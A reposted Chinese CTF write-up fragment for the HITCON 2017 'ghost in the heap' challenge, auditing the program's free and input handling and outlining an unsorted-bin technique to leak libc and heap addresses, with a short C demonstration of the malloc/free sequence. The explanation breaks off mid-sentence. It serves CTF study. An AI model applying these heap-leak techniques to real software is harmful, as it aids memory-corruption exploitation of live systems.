hitcon 2017 ghost in the heap解题记录
2018-03-08 19:03
411 查看
ghost in the heap
审计
delete heap
free后会将ghost[i]置null,所以不能double freeadd ghost
要求填入magic,但是会被read冲掉read长度小于最大限长
add heap
使用了scanf,可能使用file structscanf限制了输入长度,无法直接溢出堆
泄露libc和heap
让ghost trunk连接到unsortedbin,再释放一个unsorted bin 如果不发生合并,必然会更新unsortedbin链(ghost trunk包含泄露的Libc和heap),再次malloc时,ghost chunk size < unsortedbin trunk size大小,malloc会把ghostchunk调整到smalltrunk,发现满足0x60 size,#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main()
{
char* p1,*p2,*p3,*ptr;
ptr=malloc(0x50);
p1=malloc(0xa0);
p2=malloc(0xa0);
p3=malloc(0xa0);
free(ptr);
free(p1);
free(p3);
p1=malloc(0xa0);//unsortedbin指向一个size只有0x60的段
p3=malloc(0xa0);//malloc调整该trunk进入smalltrunk
free(p2);
p2=malloc(0xa0);
free(p1);
ptr=malloc(0x50);
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- uva 1025 A Spy in the Metro 解题报告
- Heap Verifier Stops in Appverifier and The Structure of a Page Heap Block
- Iris recognition papers in the top journals in 2017
- July Challenge 2017 | Whats in the Name
- The kth largest element in max-heap 最大堆的第k大元素
- 攻壳机动队 Ghost in the Shell
- 【二分】Petrozavodsk Winter Training Camp 2017 Day 1: Jagiellonian U Contest, Monday, January 30, 2017 Problem A. The Catcher in the Rye
- [IOS开发记录]Whose view is not in the window hierarchy 错误的解决办法
- Ghost in the Shell 2: Innocence
- android studio 编译apk出现 设置android studio in the gradle.properties file, sets the maximum Java heap si
- Memory management in C: The heap and the stack
- 世界顶级黑客自传:Ghost in the Wires
- POJ - 2388 Who's in the Middle解题报告
- “corruption in the heap” vector内存释放错误
- 编译ionic应用时遇到“To run dex in process, the Gradle daemon needs a larger heap.”
- this may be due to a corruption of the heap, which indicates a bug in ... or any of the DLLs it has
- URAL 1348 Goat in the Garden 2计算几何(解题报告)
- UVa 1326 Jurassic Remains 解题报告(Meet-in-the-Middle)
- Android开发中出现in the gradle.properties file, sets the maximum Java heap size to 1024m的解决方法
- 解题报告:Codeforces Round #226 (Div. 2)E. Bear in the Field 矩阵加速幂